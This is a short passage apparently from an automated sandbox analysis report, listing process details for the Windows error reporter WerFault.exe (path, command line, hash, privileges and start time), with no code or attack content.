      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:23
      Start time:01:27:20
      Start date:10/12/2024
      Path:C:\Windows\SysWOW64\WerFault.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 768
      Imagebase:0x1d0000
      File size:483'680 bytes
      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Disassembly

      No disassembly